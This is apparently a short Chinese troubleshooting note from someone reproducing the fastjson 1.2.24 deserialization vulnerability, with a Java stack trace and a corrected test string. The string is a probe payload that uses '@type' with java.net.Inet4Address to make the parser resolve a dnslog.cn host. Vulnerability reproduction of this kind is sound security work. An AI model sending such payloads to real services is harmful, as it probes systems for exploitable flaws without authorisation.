在fastjson1.2.24漏洞复现时出现以下错误:
Exception in thread "main" com.alibaba.fastjson.JSONException: deserialize inet adress error
at com.alibaba.fastjson.serializer.MiscCodec.deserialze(MiscCodec.java:303)
at com.alibaba.fastjson.parser.DefaultJSONParser.parseObject(DefaultJSONParser.java:368)
at com.alibaba.fastjson.parser.DefaultJSONParser.parseObject(DefaultJSONParser.java:517)
at com.alibaba.fastjson.parser.DefaultJSONParser.parse(DefaultJSONParser.java:1327)
at com.alibaba.fastjson.parser.DefaultJSONParser.parse(DefaultJSONParser.java:1293)
at com.alibaba.fastjson.JSON.parse(JSON.java:137)
at com.alibaba.fastjson.JSON.parse(JSON.java:128)
at com.alibaba.fastjson.JSON.parseObject(JSON.java:201)
at sec.Fastjson4.main(Fastjson4.java:11)
Caused by: java.net.UnknownHostException: aaa.rvb105.dnslog.cn
at java.net.Inet6AddressImpl.lookupAllHostAddr(Native Method)
at java.net.InetAddress$2.lookupAllHostAddr(InetAddress.java:929)
at java.net.InetAddress.getAddressesFromNameService(InetAddress.java:1324)
at java.net.InetAddress.getAllByName0(InetAddress.java:1277)
at java.net.InetAddress.getAllByName(InetAddress.java:1193)
at java.net.InetAddress.getAllByName(InetAddress.java:1127)
at java.net.InetAddress.getByName(InetAddress.java:1077)
at com.alibaba.fastjson.serializer.MiscCodec.deserialze(MiscCodec.java:301)
... 8 more
Process finished with exit code 1
解决方法:
- 检查自己测试使用的json字符串是否符合规范,不能出出现例如
\n
、\t
等违法字符
标准写法:
String json1 = "{\"zeo\":{\"@type\":\"java.net.Inet4Address\",\"val\":\"aaa.rvb105.dnslog.cn\"}}";
JSONObject jsonObject = JSON.parseObject(json1);